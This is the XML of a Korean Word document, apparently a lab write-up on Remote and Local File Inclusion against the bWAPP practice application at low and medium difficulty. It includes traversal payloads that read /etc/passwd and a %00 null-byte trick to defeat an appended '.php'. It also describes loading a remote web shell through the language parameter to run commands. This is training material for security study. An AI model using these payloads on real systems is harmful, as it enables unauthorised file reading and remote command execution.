            <w:r w:rsidR="00613C3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l</w:t>
            </w:r>
            <w:r w:rsidR="00613C3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 xml:space="preserve"> Fil</w:t>
            </w:r>
            <w:r w:rsidR="00613C3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e</w:t>
            </w:r>
            <w:r w:rsidR="00613C3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 xml:space="preserve"> Inclusion (RFI/LFI)</w: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C21A23" w:rsidRPr="0035631E" w14:paraId="1029D21B" w14:textId="77777777" w:rsidTr="008046E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637DDE26" w14:textId="77777777" w:rsidR="001416CF" w:rsidRPr="0035631E" w:rsidRDefault="001416CF" w:rsidP="001416CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52BC71AC" w14:textId="78B1DF67" w:rsidR="0073760D" w:rsidRPr="0035631E" w:rsidRDefault="001416CF" w:rsidP="001416CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[ Remote &amp; Local File Inclusion (RFI/LFI)</w:t>
            </w:r>
            <w:r w:rsidR="0073760D" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> –</w:t>
            </w:r>
            <w:r w:rsidR="0073760D"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난이</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">도 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>: low ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="400AEEDE" w14:textId="77777777" w:rsidR="0073760D" w:rsidRPr="0035631E" w:rsidRDefault="0073760D" w:rsidP="001416CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AD47C96" w14:textId="1EE80B75" w:rsidR="0073760D" w:rsidRPr="0035631E" w:rsidRDefault="0073760D" w:rsidP="001416CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E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L</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">FI </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E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방식</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A8C8BD" w14:textId="40BA7F78" w:rsidR="001416CF" w:rsidRPr="0035631E" w:rsidRDefault="001416CF" w:rsidP="001416CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DFDDAFD" w14:textId="52651454" w:rsidR="00C21A23" w:rsidRPr="0035631E" w:rsidRDefault="001416CF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7215ECBA" wp14:editId="63DDB8E6">
            <wp:extent cx="6840001" cy="1233239"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2413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23323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C9CD62" w14:textId="11327B7E" w:rsidR="001416CF" w:rsidRPr="0035631E" w:rsidRDefault="001416CF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언어를 선택하는 폼이 보인다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B84E70" w14:textId="6F61E2A4" w:rsidR="001416CF" w:rsidRPr="0035631E" w:rsidRDefault="001416CF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언어를 선택한 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">Go </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버튼을 클릭해보자.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940A265" w14:textId="6EC04F63" w:rsidR="001416CF" w:rsidRPr="0035631E" w:rsidRDefault="001416CF" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B28545" w14:textId="03A822A8" w:rsidR="001416CF" w:rsidRPr="0035631E" w:rsidRDefault="001416CF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091926FD" wp14:editId="3BD04EFF">
            <wp:extent cx="6840001" cy="3923711"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="196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3923711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4631F7" w14:textId="4C0A8363" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975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언어들을 클릭해보면 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">language </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변수가 s</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">elect </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>요소마다 변수값이 달라지는 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F38A4" w14:textId="53FA0313" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975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이전에 봤던 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory Traversal </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점을 이용할 수 있을 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E2B4C0" w14:textId="77777777" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DBF137" w14:textId="77777777" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAC2BAC" w14:textId="77777777" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B364E36" w14:textId="77777777" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFC90B5" w14:textId="5D632F07" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975" w:rsidP="00633431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language=../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090C19A5" w14:textId="41100F56" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975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5B369E25" wp14:editId="3075520C">
            <wp:extent cx="6840001" cy="6489047"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="266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648904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293062" w14:textId="648A25B3" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="0073760D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/e</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>tc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 내용을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5394B" w14:textId="6903AFFC" w:rsidR="0073760D" w:rsidRPr="0035631E" w:rsidRDefault="0073760D" w:rsidP="00633431">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554315B8" w14:textId="2F11A3C3" w:rsidR="00071EAC" w:rsidRPr="0035631E" w:rsidRDefault="00071EAC" w:rsidP="00071EAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">FI </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>방식</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D834A29" w14:textId="687C7FAB" w:rsidR="0073760D" w:rsidRPr="0035631E" w:rsidRDefault="00071EAC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 xml:space="preserve">Rfi </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>방식은 준비된 웹쉘 코드를 사용한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3AC041" w14:textId="32909EB2" w:rsidR="00071EAC" w:rsidRPr="0035631E" w:rsidRDefault="00071EAC" w:rsidP="0063343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1D04BD21" wp14:editId="516C4E67">
            <wp:extent cx="6840001" cy="188401"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="215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88401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1F2232" w14:textId="7FBAEE9A" w:rsidR="00071EAC" w:rsidRPr="0035631E" w:rsidRDefault="00071EAC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웹쉘이</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 위치한 웹 서버의 주소를 비박스 페이지의 language 변수 파라미터에 넣는다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F94C9" w14:textId="25D54D4B" w:rsidR="00071EAC" w:rsidRPr="0035631E" w:rsidRDefault="00071EAC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그리고</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd 파라미터를 추가해 비박스 서버에 실행</w:t>
      </w:r>
      <w:r w:rsidR="00D85135" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 명령어를 입력한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B02104" w14:textId="2F80C540" w:rsidR="00F06975" w:rsidRPr="0035631E" w:rsidRDefault="00F06975" w:rsidP="00071EAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1BF2F3" w14:textId="1A6C7A51" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="00D85135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63559325" wp14:editId="6E776244">
            <wp:extent cx="6840001" cy="573812"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="171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57381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F22D16" w14:textId="781ABEA3" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="00D85135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위 주소는 외부 파일로 웹쉘 코드 동작 시 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">“Warning” </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>경고를 출력하고 커맨드를 사용할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351059CB" w14:textId="4F518DD9" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="00D85135" w:rsidP="00071EAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BB9427" w14:textId="348D14D5" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="00D85135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03B1E565" wp14:editId="6F2C62B6">
            <wp:extent cx="6840001" cy="1043058"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2413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04305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B75804" w14:textId="4FCD7A3C" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="00D85135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 xml:space="preserve">“Warning” </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>경고 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D72D4F" w14:textId="77777777" w:rsidR="002460B2" w:rsidRPr="0035631E" w:rsidRDefault="002460B2" w:rsidP="00071EAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F45D45B" w14:textId="041B974D" w:rsidR="002460B2" w:rsidRPr="0035631E" w:rsidRDefault="002460B2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31880A4A" wp14:editId="1F305B13">
            <wp:extent cx="6840001" cy="2914157"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="196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91415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D03D46" w14:textId="40988D3B" w:rsidR="002460B2" w:rsidRPr="0035631E" w:rsidRDefault="002460B2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 xml:space="preserve">‘pwd’ </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>명령으로 현재 위치 확인.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376EEF5E" w14:textId="77777777" w:rsidR="002460B2" w:rsidRPr="0035631E" w:rsidRDefault="002460B2" w:rsidP="00071EAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBD95B2" w14:textId="73E33172" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="00D85135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4B7C7B4F" wp14:editId="6D7FB10C">
            <wp:extent cx="6840001" cy="2888782"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="260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88878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ECD08F" w14:textId="30D3C0A2" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="002460B2" w:rsidP="00071EAC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‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="00D85135" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D85135" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00D85135" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 명령을 이용하여 내용을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C859C" w14:textId="0A73F644" w:rsidR="00EF7670" w:rsidRPr="0035631E" w:rsidRDefault="00EF7670" w:rsidP="00EF7670">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[ Remote &amp; Local File Inclusion (RFI/LFI) –</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: medium ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB3DE9" w14:textId="77777777" w:rsidR="00942DE7" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="00EF7670">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C33973" w14:textId="3342D7C1" w:rsidR="00D85135" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="00EF7670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7C37524C" wp14:editId="69C28872">
            <wp:extent cx="6840001" cy="4783945"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1714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783945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093824" w14:textId="77777777" w:rsidR="00942DE7" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="00942DE7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language=../../../../etc/passwd&amp;action=go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E7A36" w14:textId="77777777" w:rsidR="00942DE7" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="00EF7670">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265BE53A" w14:textId="3A470458" w:rsidR="00942DE7" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="00EF7670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난이도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l</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ow에서 했던 것처럼 language 변수 파라미터에 LFI 공격을 수행해본다</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBC43C" w14:textId="67B7A981" w:rsidR="00942DE7" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="00942DE7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lastRenderedPageBreak/>
        <w:t>위처럼</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 오류 메시지가 출력되는데 "../../../etc/passwd.php</w:t>
      </w:r>
      <w:r w:rsidR="008134D3" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008134D3" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 되어 있는 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA41766" w14:textId="77777777" w:rsidR="00942DE7" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="00942DE7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오류</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 메시지를 통해 language 변수 파라미터의 값 뒤에 ".php" 문자를 붙인다는 것을 추측할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01399867" w14:textId="77777777" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3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따라서</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> %00(NULL) 문자를 사용해서 뒤 코드를 무시하고 원하는 공격을 수행할 수 있도록 해보겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C5E438" w14:textId="4155D528" w:rsidR="00942DE7" w:rsidRPr="0035631E" w:rsidRDefault="00942DE7" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DF476C" w14:textId="6971BFD5" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3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2EF9FBEA" wp14:editId="1EEACF69">
            <wp:extent cx="6840001" cy="6756347"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="260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6756347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D95074" w14:textId="0068B977" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3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공격에 성공한 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D369BFC" w14:textId="3A212C73" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B31A3C" w14:textId="63023D32" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F2995A" w14:textId="60F20B01" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409D0220" w14:textId="62675A84" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32087270" w14:textId="091B0F87" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2F638A" w14:textId="2B0A9980" w:rsidR="008134D3" w:rsidRPr="0035631E" w:rsidRDefault="008134D3" w:rsidP="008134D3">
      <w:pPr>
        <w:rPr>
